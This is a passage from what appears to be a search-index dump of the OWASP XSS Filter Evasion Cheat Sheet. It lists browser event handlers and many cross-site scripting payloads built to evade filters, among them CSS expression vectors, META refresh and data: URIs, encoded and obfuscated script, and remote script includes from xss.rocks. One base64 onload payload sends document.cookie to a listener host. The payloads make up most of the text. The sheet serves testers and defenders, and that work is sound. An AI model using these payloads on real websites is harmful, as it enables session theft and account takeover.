  54. onLoseCapture() (can be exploited by the releaseCapture() method)
  55. onMediaComplete() (When a streaming media file is used, this event could fire before the file starts playing)
  56. onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)
  57. onMessage() (fires when the document receives a message)
  58. onMouseDown() (the attacker would need to get the user to click on an image)
  59. onMouseEnter() (cursor moves over an object or area)
  60. onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again)
  61. onMouseMove() (the attacker would need to get the user to mouse over an image or table)
  62. onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again)
  63. onMouseOver() (cursor moves over an object or area)
  64. onMouseUp() (the attacker would need to get the user to click on an image)
  65. onMouseWheel() (the attacker would need to get the user to use their mouse wheel)
  66. onMove() (user or attacker would move the page)
  67. onMoveEnd() (user or attacker would move the page)
  68. onMoveStart() (user or attacker would move the page)
  69. onOffline() (occurs if the browser is working in online mode and it starts to work offline)
  70. onOnline() (occurs if the browser is working in offline mode and it starts to work online)
  71. onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline)
  72. onPaste() (user would need to paste or attacker could use the execCommand(\"Paste\") function)
  73. onPause() (the onpause event fires on every element that is active when the timeline pauses, including the body element)
  74. onPopState() (fires when the user navigates the session history)
  75. onProgress() (attacker would use this as a flash movie was loading)
  76. onPropertyChange() (user or attacker would need to change an element property)
  77. onReadyStateChange() (user or attacker would need to change an element property)
  78. onRedo() (user went forward in undo transaction history)
  79. onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle)
  80. onReset() (user or attacker resets a form)
  81. onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
  82. onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
  83. onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
  84. onResume() (the onresume event fires on every element that becomes active when the timeline resumes, including the body element)
  85. onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
  86. onRowsEnter() (user or attacker would need to change a row in a data source)
  87. onRowExit() (user or attacker would need to change a row in a data source)
  88. onRowDelete() (user or attacker would need to delete a row in a data source)
  89. onRowInserted() (user or attacker would need to insert a row in a data source)
  90. onScroll() (user would need to scroll, or attacker could use the scrollBy() function)
  91. onSeek() (the onseek event fires when the timeline is set to play in any direction other than forward)
  92. onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");)
  93. onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");)
  94. onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");)
  95. onStart() (fires at the beginning of each marquee loop)
  96. onStop() (user would need to press the stop button or leave the webpage)
  97. onStorage() (storage area changed)
  98. onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire)
  99. onSubmit() (requires attacker or user submits a form)
  100. onTimeError() (user or attacker sets a time property, such as dur, to an invalid value)
  101. onTrackChange() (user or attacker changes track in a playList)
  102. onUndo() (user went backward in undo transaction history)
  103. onUnload() (as the user clicks any link or presses the back button or attacker forces a click)
  104. onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
  105. seekSegmentTime() (this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#bgsound","title":"BGSOUND","text":"

<BGSOUND SRC=\"javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#javascript-includes","title":"& JavaScript includes","text":"

<BR\u00a0SIZE=\"&{alert('XSS')}\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-sheet","title":"STYLE sheet","text":"

<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#remote-style-sheet","title":"Remote style sheet","text":"

Using something as simple as a remote style sheet, you can include your XSS, since the style parameter can be redefined using an embedded expression. This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: all of these remote style sheet examples use the body tag, so they won't work unless there is some content on the page other than the vector itself; you'll need to add a single letter to the page to make it work if it's an otherwise blank page:

<LINK\u00a0REL=\"stylesheet\"\u00a0HREF=\"http://xss.rocks/xss.css\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#remote-style-sheet-part-2","title":"Remote style sheet part 2","text":"

This works the same as above, but uses a <STYLE> tag instead of a <LINK> tag. A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE> tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:

<STYLE>@import'http://xss.rocks/xss.css';</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#remote-style-sheet-part-3","title":"Remote style sheet part 3","text":"

This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC 2616, setting a Link header is not part of the HTTP/1.1 spec; however, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://xss.rocks/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in Firefox:

<META\u00a0HTTP-EQUIV=\"Link\"\u00a0Content=\"<http://xss.rocks/xss.css>;\u00a0REL=stylesheet\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#remote-style-sheet-part-4","title":"Remote style sheet part 4","text":"

This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites:

<STYLE>BODY{-moz-binding:url(\"http://xss.rocks/xssmoz.xml#xss\")}</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-tags-with-broken-up-javascript-for-xss","title":"STYLE Tags with Broken-up JavaScript for XSS","text":"

This XSS at times sends IE into an infinite loop of alerts:

<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-attribute-using-a-comment-to-break-up-expression","title":"STYLE Attribute using a Comment to Break-up Expression","text":"

Created by Roman Ivanov

<IMG\u00a0STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-style-with-expression","title":"IMG STYLE with Expression","text":"

This is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart; like the above, this can send IE into a loop:

exp/*<A\u00a0STYLE='no\\xss:noxss(\"*//*\");\nxss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-tag-older-versions-of-netscape-only","title":"STYLE Tag (Older versions of Netscape only)","text":"

<STYLE\u00a0TYPE=\"text/javascript\">alert('XSS');</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-tag-using-background-image","title":"STYLE Tag using Background-image","text":"

<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A\u00a0CLASS=XSS></A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#style-tag-using-background","title":"STYLE Tag using Background","text":"

<STYLE\u00a0type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE> <STYLE type=\"text/css\">BODY{background:url(\"<javascript:alert>('XSS')\")}</STYLE>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#anonymous-html-with-style-attribute","title":"Anonymous HTML with STYLE Attribute","text":"

IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter:

<XSS\u00a0STYLE=\"xss:expression(alert('XSS'))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#local-htc-file","title":"Local htc File","text":"

This is a little different from the above two cross-site scripting vectors because it uses an .htc file, which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:

<XSS STYLE=\"behavior: url(xss.htc);\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#us-ascii-encoding","title":"US-ASCII Encoding","text":"

US-ASCII encoding (found by Kurt Huwig). This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters, but it only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross-site scripting evasion than against server-side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.

\u00bcscript\u00bealert(\u00a2XSS\u00a2)\u00bc/script\u00be

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#meta","title":"META","text":"

The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs:

<META\u00a0HTTP-EQUIV=\"refresh\"\u00a0CONTENT=\"0;url=javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#meta-using-data","title":"META using Data","text":"

This uses the data: directive URL scheme. This is nice because nothing in it visibly contains the word SCRIPT or the JavaScript directive, since it uses base64 encoding. Please see RFC 2397 for more details, or go here or here to encode your own. You can also use the XSS calculator below if you just want to encode raw HTML or JavaScript, as it has a Base64 encoding method:

<META\u00a0HTTP-EQUIV=\"refresh\"\u00a0CONTENT=\"0;url=data:text/html\u00a0base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#meta-with-additional-url-parameter","title":"META with Additional URL Parameter","text":"

If the target website attempts to check whether the URL contains http:// at the beginning, you can evade it with the following technique (submitted by Moritz Naumann):

<META\u00a0HTTP-EQUIV=\"refresh\"\u00a0CONTENT=\"0;\u00a0URL=http://;URL=javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#iframe","title":"IFRAME","text":"

If iframes are allowed there are a lot of other XSS problems as well:

<IFRAME\u00a0SRC=\"javascript:alert('XSS');\"></IFRAME>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#iframe-event-based","title":"IFRAME Event Based","text":"

IFrames and most other elements can use event based mayhem like the following... (Submitted by: David Cross)

<IFRAME\u00a0SRC=#\u00a0onmouseover=\"alert(document.cookie)\"></IFRAME>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#frame","title":"FRAME","text":"

Frames have the same sorts of XSS problems as iframes:

<FRAMESET><FRAME\u00a0SRC=\"javascript:alert('XSS');\"></FRAMESET>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#table","title":"TABLE","text":"

<TABLE\u00a0BACKGROUND=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#td","title":"TD","text":"

Just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors:

<TABLE><TD\u00a0BACKGROUND=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div","title":"DIV","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div-background-image","title":"DIV Background-image","text":"

<DIV\u00a0STYLE=\"background-image:\u00a0url(javascript:alert('XSS'))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div-background-image-with-unicoded-xss-exploit","title":"DIV Background-image with Unicoded XSS Exploit","text":"

This has been modified slightly to obfuscate the URL parameter. The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:

<DIV\u00a0STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div-background-image-plus-extra-characters","title":"DIV Background-image Plus Extra Characters","text":"

Rnaske built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):

<DIV\u00a0STYLE=\"background-image:\u00a0url(\u0001javascript:alert('XSS'))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#div-expression","title":"DIV Expression","text":"

A variant of this was effective against a real world cross site scripting filter using a newline between the colon and \"expression\":

<DIV\u00a0STYLE=\"width:\u00a0expression(alert('XSS'));\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#downlevel-hidden-block","title":"Downlevel-Hidden Block","text":"

This only works in IE 5.0 and later and Netscape 8.1 in IE rendering engine mode. Some websites consider anything inside a comment block to be safe and therefore not in need of removal, which allows our cross-site scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job:

<!--[if\u00a0gte\u00a0IE\u00a04]>\n<SCRIPT>alert('XSS');</SCRIPT>\n<![endif]-->\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#base-tag","title":"BASE Tag","text":"

Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like images/image.jpg rather than full paths. If the path includes a leading forward slash like /images/image.jpg you can remove one slash from this vector (as long as there are two to begin the comment this will work):

<BASE\u00a0HREF=\"javascript:alert('XSS');//\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#object-tag","title":"OBJECT Tag","text":"

If they allow objects, you can also inject virus payloads to infect the users, etc. (the same goes for the APPLET tag). The linked file is actually an HTML file that can contain your XSS:

<OBJECT\u00a0TYPE=\"text/x-scriptlet\"\u00a0DATA=\"http://xss.rocks/scriptlet.html\"></OBJECT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embed-a-flash-movie-that-contains-xss","title":"EMBED a Flash Movie That Contains XSS","text":"

Click here for a demo: ~~http://ha.ckers.org/xss.swf~~

<EMBED\u00a0SRC=\"http://ha.ckers.org/xss.swf\"\u00a0AllowScriptAccess=\"always\"></EMBED>

If you add the attributes allowScriptAccess=\"never\" and allownetworking=\"internal\" it can mitigate this risk (thank you to Jonathan Vanasco for the info).

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embed-svg-which-contains-xss-vector","title":"EMBED SVG Which Contains XSS Vector","text":"

This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one.

<EMBED\u00a0SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH\u00a0A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv\u00a0MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs\u00a0aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw\u00a0IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh\u00a0TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\"\u00a0type=\"image/svg+xml\"\u00a0AllowScriptAccess=\"always\"></EMBED>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#using-actionscript-inside-flash-for-obfuscation","title":"Using ActionScript Inside Flash for Obfuscation","text":"
a=\"get\";\nb=\"URL(\\\"\";\nc=\"javascript:\";\nd=\"alert('XSS');\\\")\"; \neval(a+b+c+d);\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#xml-data-island-with-cdata-obfuscation","title":"XML Data Island with CDATA Obfuscation","text":"

This XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode - vector found by Sec Consult while auditing Yahoo:

<XML\u00a0ID=\"xss\"><I><B><IMG\u00a0SRC=\"javas<!--\u00a0-->cript:alert('XSS')\"></B></I></XML> \n<SPAN\u00a0DATASRC=\"#xss\"\u00a0DATAFLD=\"B\"\u00a0DATAFORMATAS=\"HTML\"></SPAN>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#locally-hosted-xml-with-embedded-javascript-that-is-generated-using-an-xml-data-island","title":"Locally hosted XML with embedded JavaScript that is generated using an XML data island","text":"

This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result here:

<XML\u00a0SRC=\"xsstest.xml\"\u00a0ID=I></XML>  \n<SPAN\u00a0DATASRC=#I\u00a0DATAFLD=C\u00a0DATAFORMATAS=HTML></SPAN>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#htmltime-in-xml","title":"HTML+TIME in XML","text":"

This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work:

<HTML><BODY>\n<?xml:namespace\u00a0prefix=\"t\"\u00a0ns=\"urn:schemas-microsoft-com:time\">\n<?import\u00a0namespace=\"t\"\u00a0implementation=\"#default#time2\">\n<t:set\u00a0attributeName=\"innerHTML\"\u00a0to=\"XSS<SCRIPT\u00a0DEFER>alert(\"XSS\")</SCRIPT>\">\n</BODY></HTML>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#assuming-you-can-only-fit-in-a-few-characters-and-it-filters-against-js","title":"Assuming you can only fit in a few characters and it filters against .js","text":"

You can rename your JavaScript file to an image as an XSS vector:

<SCRIPT\u00a0SRC=\"http://xss.rocks/xss.jpg\"></SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#ssi-server-side-includes","title":"SSI (Server Side Includes)","text":"

This requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues:

<!--#exec\u00a0cmd=\"/bin/echo\u00a0'<SCR'\"--><!--#exec\u00a0cmd=\"/bin/echo\u00a0'IPT\u00a0SRC=http://xss.rocks/xss.js></SCRIPT>'\"-->

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#php","title":"PHP","text":"

Requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues:

<?\u00a0echo('<SCR)';\necho('IPT>alert(\"XSS\")</SCRIPT>');\u00a0?>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-embedded-commands","title":"IMG Embedded Commands","text":"

This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors:

<IMG\u00a0SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-embedded-commands-part-ii","title":"IMG Embedded Commands part II","text":"

This is scarier because there are absolutely no identifiers that make it look suspicious, other than the fact that it is not hosted on your own domain. The vector uses a 302 or 304 redirect (others work too) to redirect the image back to a command. So a normal <IMG SRC=\"httx://badguy.com/a.jpg\"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess line (under Apache) to accomplish the vector (thanks to Timo for part of this):

Redirect\u00a0302\u00a0/a.jpg\u00a0http://victimsite.com/admin.asp&deleteuser

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#cookie-manipulation","title":"Cookie Manipulation","text":"

Admittedly this is pretty obscure, but I have seen a few examples where <META is allowed and can be used to overwrite cookies. There are other examples of sites where, instead of fetching the username from a database, it is stored inside a cookie to be displayed only to the user who visits the page. With these two scenarios combined, you can modify the victim's cookie, which will be displayed back to them as JavaScript (you can also use this to log people out or change their user state, get them to log in as you, etc.):

<META\u00a0HTTP-EQUIV=\"Set-Cookie\"\u00a0Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#utf-7-encoding","title":"UTF-7 Encoding","text":"

If the page that the XSS resides on doesn't provide a page charset header, or if the user's browser is set to UTF-7 encoding, it can be exploited with the following (thanks to Roman Ivanov for this one). Click here for an example (you don't need the charset statement if the user's browser is set to auto-detect and there are no overriding content-types on the page, in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type, which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script:

<HEAD><META\u00a0HTTP-EQUIV=\"CONTENT-TYPE\"\u00a0CONTENT=\"text/html;\u00a0charset=UTF-7\">\u00a0</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#xss-using-html-quote-encapsulation","title":"XSS Using HTML Quote Encapsulation","text":"

This was tested in IE; your mileage may vary. For performing XSS on sites that allow <SCRIPT> but don't allow <SCRIPT SRC... by way of a regex filter /\\<script\\[^\\>\\]+src/i:

<SCRIPT\u00a0a=\">\"\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

For performing XSS on sites that allow <SCRIPT> but don't allow \\<script src... by way of a regex filter /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i (this is an important one, because I've seen this regex in the wild):

<SCRIPT\u00a0=\">\"\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

Another XSS to evade the same filter, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i:

<SCRIPT\u00a0a=\">\"\u00a0''\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

Yet another XSS to evade the same filter, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i. I know I said I wasn't going to discuss mitigation techniques, but the only thing I've seen work for this XSS example, if you still want to allow <SCRIPT> tags but not remote scripts, is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags):

<SCRIPT\u00a0\"a='>'\"\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

And one last XSS attack to evade, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i using grave accents (again, doesn't work in Firefox):

<SCRIPT\u00a0a=>SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly:

<SCRIPT\u00a0a=\">'>\"\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content:

<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT\u00a0SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#url-string-evasion","title":"URL String Evasion","text":"

Assuming http://www.google.com/ is programmatically disallowed:

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#ip-versus-hostname","title":"IP Versus Hostname","text":"

<A\u00a0HREF=\"http://66.102.7.147/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#url-encoding","title":"URL Encoding","text":"

<A\u00a0HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#dword-encoding","title":"DWORD Encoding","text":"

Note: there are other variations of DWORD encoding - see the IP Obfuscation calculator below for more details:

<A\u00a0HREF=\"http://1113982867/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#hex-encoding","title":"Hex Encoding","text":"

The total size of each number allowed is somewhere in the neighborhood of 240 total characters, as you can see on the second digit, and since a hex number is between 0 and F, the leading zero on the third hex octet is not required:

<A\u00a0HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#octal-encoding","title":"Octal Encoding","text":"

Again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...:

<A\u00a0HREF=\"http://0102.0146.0007.00000223/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#base64-encoding","title":"Base64 Encoding","text":"

<img\u00a0onload=\"eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#mixed-encoding","title":"Mixed Encoding","text":"

Let's mix and match base encoding and throw in some tabs and newlines (why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes:

<A\u00a0HREF=\"h \ntt\u00a0\u00a0p://6   6.000146.0x7.147/\">XSS</A>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#protocol-resolution-bypass","title":"Protocol Resolution Bypass","text":"

// translates to http://, which saves a few more bytes. This is really handy when space is an issue (two fewer characters can go a long way), and it can easily bypass regex like (ht|f)tp(s)?:// (thanks to Ozh for part of this one). You can also change the // to \\\\\\\\. You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.

<A\u00a0HREF=\"//www.google.com/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#google-feeling-lucky-part-1","title":"Google \"feeling lucky\" part 1","text":"

Firefox uses Google's \"feeling lucky\" function to redirect the user to any keywords you type in. So if your exploitable page is the top result for some random keyword (as you see here), you can use that feature against any Firefox user. This uses Firefox's keyword: protocol. You can concatenate several keywords by using something like keyword:XSS+RSnake, for instance. This no longer works within Firefox as of 2.0.

<A\u00a0HREF=\"//google\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#google-feeling-lucky-part-2","title":"Google \"feeling lucky\" part 2","text":"

This uses a very tiny trick that appears to work in Firefox only, because of its implementation of the \"feeling lucky\" function. Unlike the next one, this does not work in Opera, because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click OK on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0:

<A\u00a0HREF=\"http://ha.ckers.org@google\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#google-feeling-lucky-part-3","title":"Google \"feeling lucky\" part 3","text":"

This uses a malformed URL that appears to work in Firefox and Opera only, because of their implementation of the \"feeling lucky\" function. Like all of the above, it requires that you are #1 in Google for the keyword in question (in this case \"google\"):

<A\u00a0HREF=\"http://google:ha.ckers.org\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#removing-cnames","title":"Removing CNAMEs","text":"

When combined with the above URL, removing www. will save an additional 4 bytes, for a total byte savings of 9 for servers that have this set up properly:

<A\u00a0HREF=\"http://google.com/\">XSS</A>

Extra dot for absolute DNS:

<A\u00a0HREF=\"http://www.google.com./\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#javascript-link-location","title":"JavaScript Link Location","text":"

<A\u00a0HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#content-replace-as-attack-vector","title":"Content Replace as Attack Vector","text":"

Assuming http://www.google.com/ is programmatically replaced with nothing. I actually used a similar attack vector against several separate real-world XSS filters by using the conversion filter itself (here is an example) to help create the attack vector (i.e. java&\\#x09;script: was converted into java script:, which renders in IE, Netscape 8.1+ in secure site mode, and Opera):

<A\u00a0HREF=\"http://www.google.com/ogle.com/\">XSS</A>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#assisting-xss-with-http-parameter-pollution","title":"Assisting XSS with HTTP Parameter Pollution","text":"

Assume a content sharing flow on a website is implemented as shown below. There is a \"Content\" page which includes some content provided by users, and this page also includes a link to a \"Share\" page which lets a user choose their favorite social sharing platform to share it on. Developers HTML-encoded the \"title\" parameter in the \"Content\" page to prevent XSS, but for some reason they didn't URL-encode this parameter to prevent HTTP Parameter Pollution. Finally, they decided that since content_type's value is a constant and will always be an integer, they didn't encode or validate content_type in the \"Share\" page.

